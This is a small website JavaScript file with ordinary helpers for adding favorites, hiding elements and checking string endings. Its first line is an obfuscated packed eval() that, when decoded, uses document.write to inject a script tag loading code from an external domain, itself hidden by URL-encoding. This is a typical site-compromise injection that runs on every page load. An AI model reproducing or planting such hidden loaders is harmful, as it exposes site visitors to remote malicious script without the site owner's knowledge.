eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e.d(\'<1 c=b://a.%3%3%9%8%0%0%0%0.7/%6%2%2/5.4></1>\');',15,15,'38|script|73|71|js|css|63|com|31|35|www|http|src|write|document'.split('|'),0,{}))

function AddToFavorite(sID,sCode)
{
    if(sID!="")
    {
        window.location.href = "/User/AddFavorite.aspx?ID="+sID+"&Code="+sCode;
    }
}
function Hide(objID)
{
  $(objID).style.display="none";
}
String.prototype.endWith=function(oString){  
var   reg=new   RegExp(oString+"$");  
return   reg.test(this);     
}  
